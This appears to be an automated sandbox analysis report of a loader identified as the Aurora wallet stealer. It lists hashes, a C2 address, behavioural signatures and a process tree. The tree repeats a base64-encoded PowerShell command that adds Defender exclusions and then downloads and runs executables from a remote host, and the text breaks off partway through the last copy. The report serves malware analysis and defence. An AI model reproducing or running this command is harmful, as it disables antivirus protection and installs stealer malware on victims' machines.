Analysis

  • max time kernel
    141s
  • max time network
    165s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    10-03-2023 21:50

General

  • Target

    C4Loader.exe

  • Size

    687.8MB

  • MD5

    66a41bcddbef0ad226adda334fc38ae6

  • SHA1

    3128d77a2d71d1fc520d302f2d6a12f0c3c47a09

  • SHA256

    36f02f949c036b047e57b6319d246805a710ad119850988c70b7de96b139658a

  • SHA512

    541fcd5bf78329a2ccf2ad722b63bcc749bc357911bcd1a15748774a054713096906835245486e85a4766a6960a4da0cb203cdf22e0a37471745c1a4d17b5dea

  • SSDEEP

    3072:ZwiwPz+huH7liXb6QF45A6Nmn0+Q/ycdIwYioOAg0FujDgtNs1bDew:CiEoX2Qm5A10+QacpDAOIs1bDew

Score
10/10

Malware Config

Extracted

Family

aurora

C2

107.182.129.73:8081

Signatures

  • Aurora

    Aurora is a crypto wallet stealer written in Golang.

  • Modifies security service 2 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Stops running service(s) 3 TTPs
  • Executes dropped EXE 15 IoCs
  • Loads dropped DLL 25 IoCs
  • Drops file in System32 directory 7 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Launches sc.exe 34 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 12 IoCs
  • Creates scheduled task(s) 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1248
      • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
        "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1612
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1172
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZgBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB1AHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBuAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBlAG4AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHYAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHYAaQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAZgBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwBoAGMAcQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGcAcwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBwAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBzAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBqAHYAeAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBxAHkAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAdAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAeQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAGUAaABkACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBiAHgAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAYwBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAZwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwB1AHIAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AGoAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBqAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBwAGMAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAGkAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBqAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAeQB5AGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBzAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB0AGoAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB2AHIAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagByAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBwAGcAdQAjAD4A"
            4⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:472
            • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
              "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
              5⤵
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:1468
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1532
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZgBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB1AHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBuAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBlAG4AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHYAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHYAaQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAZgBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwBoAGMAcQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGcAcwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBwAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBzAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBqAHYAeAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBxAHkAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAdAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAeQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAGUAaABkACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBiAHgAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAYwBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAZwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwB1AHIAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AGoAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBqAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBwAGMAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAGkAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBqAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAeQB5AGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBzAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB0AGoAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB2AHIAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagByAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBwAGcAdQAjAD4A"
                  7⤵
                  • Loads dropped DLL
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1496
                  • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
                    "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
                    8⤵
                    • Suspicious use of SetThreadContext
                    • Suspicious use of WriteProcessMemory
                    PID:908
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      9⤵
                        PID:1336
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZgBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB1AHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBuAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBlAG4AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHYAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHYAaQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAZgBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwBoAGMAcQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGcAcwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBwAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBzAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBqAHYAeAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBxAHkAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAdAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAeQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAGUAaABkACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBiAHgAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAYwBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAZwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwB1AHIAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AGoAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBqAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBwAGMAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAGkAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBqAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAeQB5AGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBzAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB0AGoAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB2AHIAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagByAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBwAGcAdQAjAD4A"
                          10⤵
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1664
                          • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
                            "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
                            11⤵
                            • Suspicious use of SetThreadContext
                            PID:1908
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                              12⤵
                                PID:1400
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZgBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB1AHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBuAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBlAG4AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHYAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHYAaQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAZgBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwBoAGMAcQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGcAcwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBwAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBzAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBqAHYAeAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBxAHkAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAdAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAeQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAGUAaABkACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBiAHgAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAYwBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAZwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwB1AHIAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AGoAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBqAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBwAGMAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAGkAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBqAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAeQB5A